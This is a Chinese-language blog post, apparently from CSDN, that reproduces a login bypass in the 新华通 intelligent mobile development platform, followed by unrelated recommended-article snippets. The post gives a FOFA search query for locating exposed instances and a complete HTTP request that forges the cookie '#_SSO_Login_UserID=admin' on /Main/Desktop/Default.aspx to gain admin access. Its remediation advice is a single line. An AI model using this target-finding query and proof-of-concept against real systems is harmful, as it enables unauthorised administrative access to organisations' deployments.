新华通智能移动开发平台登录绕过

于 2024-08-30 10:36:57 发布
阅读量49 收藏
点赞数 1
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141710574
版权

0x01 漏洞描述:

新华通智能移动开发平台/Main/Desktop/Default.aspx中存在权限绕过,请求中构造特殊cookie可绕过登录限制。

0x02 搜索语句:

FOFA:icon_hash="513304261"

0x03 漏洞复现:

访问特定接口

/Main/Desktop/Default.aspx

 在cookie中加入

#_SSO_Login_UserID=admin

 完整poc如下

GET /Main/Desktop/Default.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Connection: close
Cookie:#_SSO_Login_UserID=admin
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

实现绕过

0x04 修复建议:

关闭互联网访问权限并限制接口访问

iSee857
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JS 逆向高阶之 - nodejs 常用的几个加密, 解密的库
yijianxiangde100的专栏
08-10 46
它是基于椭圆曲线密码的公钥密码算法标准,其秘钥长度256bit,包含数字签名、密钥交换和公钥加密,用于替换RSA/DH/ECDSA/ECDH等国际算法。用椭圆曲线对实现的基于标识的数字签名算法、密钥交换协议、密钥封装机制和公钥加密与解密算法,包括数字签名生成算法和验证算法,并给出了数字签名与验证算法及其相应的流程。对称加密算法中的分组加密算法,其分组长度、秘钥长度都是128bit,算法安全保密强度跟 AES 相当,但是算法不公开,仅以IP核的形式存在于芯片中,需要过加密芯片的接口进行调用。
python主要方向有哪些、区别是什么-学习Python的六大发展方向,你知道吗?
weixin_37988176的博客
10-30 4494
近年来,Python语言被广泛应用到互联网等各个领域。其简易性、易读性、可扩展性等优势被行业所认可。那么学习Python之后都可以朝哪些方向发展呢?下面就来看一下吧。一、Python全栈工程师全栈工程师在众多语言中都被视为是高尖人才。目前全栈工程师月均薪资达到12838元。而整个行业来看,Python Web全栈工程师的薪资相比之前则高出5k—10k。因此很多有能力的人才,首选的一个方向就是Pyt...
城市如何打好智慧这张牌 专家说要绕过9个坑 建9个单元
weixin_33816821的博客
07-03 250
在经济新常态、新型城镇化、去产能和供给侧改革等的复合背景下,“经营城市”的理念、思维和策略,在城市治理中突显生命力。城市经营的核心应当是努力提高城市的品牌建设水平,促进城市“标签”富含张力、内涵、魅力和吸引力,进而保障城市在要素的竞争与合作中,处于优势地位。特别是围绕城市品牌的要素,能够在政府和市场等的作用下,实现更佳的配置。《国家新型城镇化规划》明确提...
一个逗比 程序员 web前端的理想!
恶魔的眼泪
10-23 9607
转载分享,不喜勿喷。欢迎讨论,相信眼前看到的,珍惜自己拥有的。最近也精神有些萎靡,也想写点什么记录下个人的成长经历,希望能与大家一起共勉。这几天因为咽炎犯了,烟也不能抽,实在是无趣。给自己煮了杯咖啡,让这杯咖啡伴随我写完这篇逗比的自述吧,囧。
智头条」十四五数字经济发展规划发布,工信部推动充电标准统一
01-14 7668
行业动态 国务院印发《“十四五”数字经济发展规划》 国务院近日印发《“十四五”数字经济发展规划》。规划提出,推动5G商用部署和规模应用,加大6G技术研发支持力度;深化人工智能、虚拟现实、8K高清视频等技术的融合;加强和改进反垄断执法;进一步强化个人信息保护,规范身份信息、隐私信息、生物特征信息的采集、传输和使用等。 《规划》明确坚持“创新引领、融合发展,应用牵引、数据赋能,公平竞争、安全有序,系统推进、协同高效”的原则。到2025年,数字经济核心产业增加值占国内生产总...
元宇宙iwemeta:元宇宙数字人实践落地应用场景
周红伟讲AI
12-06 5221
虚拟数字人,智能语音新故事 我们从中国智能语音技术十年发展脉络来看,对于虚拟数字人新玩法的探索,不仅是一场搜狗(腾讯)和科大讯飞两大智能语音技术龙头的对拼,更是一场将整个互联网、消费电子、行业玩家圈入混战的开始。 从语音助手进化到虚拟数字人,是人工智能技术与人类交互方式进化新的重要节点。当然,正如腾讯李学朝指出的,当下,虚拟数字人发展仍处于探索阶段,还有很长的路要走。这很有可能是一场智能语音赛道的升维战,也是AI交互领域的未来新战场。
从显示屏时代进入处理器时代──以OTT智能电视服务模式带动新华社视听新媒体融合发展.pdf
09-25
OTT智能电视服务模式是指过互联网直接向用户提供电视内容,绕过了传统的有线电视网络。这种模式充分利用了互联网的开放性和灵活性,使得内容分发不再局限于特定的硬件平台,而是可以跨设备、跨平台进行。OTT服务...
互联网+脑科学,中国脑计划的机会
互联网进化论-刘锋
07-03 2992
从各国目前脑计划的制定看,互联网这个因素并没有得到足够的重视。没有互联网作为参照物,宏大的脑计划必将成为无源之水,无根之木,目前欧美脑计划出现的问题已经反映出这种倾向。中国互联网的快速发展也为中国脑计划的开展奠定了良好的基础和得天独厚的优势,互联网+脑科学,互联网神经学的研究,中国脑计划完全可以对欧美实现弯道超车,找到中国突破的新科学领域。
android开发常用组件和第三方库(二)
watertekhqx的博客
05-09 7137
都是在github上开源的项目,覆盖面非常之广,有它在手android开发无忧
乾元渠道商中标湖南省煤业集团公司安全生产预防和应急救援能力建设装备配备采购项目
QDLL123的博客
08-29 115
近日,乾元渠道商中标湖南省煤业集团安全生产预防和应急救援能力建设装备配备采购项目,乾元作为聚合讯保障技术厂家,为项目一标段卫星讯指挥车提供车载聚合路由器终端及系统。
基于视觉识别引擎+深度学习实现安全保障数字化的智慧城管开源了
weixin_63598920的博客
08-26 612
智慧城管视觉监控平台是一款功能强大且简单易用的实时算法视频监控系统。它的愿景是最底层打各大芯片厂商相互间的壁垒,省去繁琐重复的适配流程,实现芯片、算法、应用的全流程组合,从而大大减少企业级应用约95%的开发成本。用户只需在界面上进行简单的操作,就可以实现全视频的接入及布控。
k8s安全
ljj19910401的博客
08-29 534
Kubernetes(k8s)的安全机制是围绕保护其API Server来设计的,主要包括认证(Authentication)、鉴权(Authorization)和准入控制(Admission Control)三个核心环节。
Django框架安全
brucexia的专栏
08-29 708
Django框架安全中包括了保护Django驱动的网站的建议,具体内容如下:1. 跨站点脚本(XSS)保护XSS攻击使用户可以将客户端脚本注入其他用户的浏览器中。只要在包含数据到页面中之前未对数据进行充分的清理,XSS攻击就可以源自任何不受信任的数据源,例如Cookie或Web服务。使用Django模板可保护站点免受大多数XSS攻击,但更重要的是要了解其提供的保护及其限制。Django模板会转义特定字符,这对于HTML来说尤其危险。尽管这可以保护用户免受大多数恶意输入的侵害,但这并不是绝对安全的。
[ICS] 物理安全
08-26 1384
#工业控制系统气泡模型理论 #端口锁定 #物理端口安全 #设施监控 #爆炸物检测计划 #USB 端口阻塞
危化品如何在室外安全暂存
最新发布
SAVEST的博客
08-29 699
危化品是指具有毒害、腐蚀、爆炸、燃烧、助燃等性质,对人体、设施、环境具有危害的剧毒化学品和其他化学品。在生产、使用、储存和运输过程中,危化品都需要严格的安全措施和合规操作。室外暂存是指将危化品在室外指定区域进行短期储存,以便后续处理或转运。这种存储方式在危化品管理中具有重要意义,但在实践中也面临着安全管理和效率的挑战。
注册安全分析报告:助信息
Explinks的博客
08-26 1068
上海助信息科技在近10年的历程中,以专业的服务团队、国际化、高标准的工作流程为超过10万余家企事业单位提供提供国内领先的网络接入服务和互联网行业增值服务,技术实力雄厚,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。
密码管理最佳实践:安全存储与定期更换的艺术
A526847的博客
08-27 456
在数字化时代,密码作为我们个人信息与资产安全的第一道防线,其重要性不言而喻。然而,随着网络威胁日益复杂多样,仅仅设置一个强密码已不足以保障安全。良好的密码管理实践,特别是安全存储与定期更换密码,成为了维护个人与企业安全的关键。本文将深入探讨这两项密码管理艺术的精髓。
企业产品网络安全日志8月26日-威胁感知建设,三方漏洞升级
KD的疯狂实验室
08-26 266
其中工作之一是打AWS DNS Firewall 与 Security Hub。当发生威胁事件时,Security Hub能接收到情报知。三方依赖组件漏洞升级,无论对于哪个公司都是一个挑战性的事情。逐步升级也是对现有产品的一个负责。今天跟部分基础服务开发进行深入沟,了解了当前升级的挑战,特别是对稳定性的影响。一味的升级,其实在没有架构师规划的情况下,实际并不可控。两者不能直,需要使用lambda进行触发。2 当前方法未触发风险,但未来可能触发的。就可以按照这个方向逐步升级或规避。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值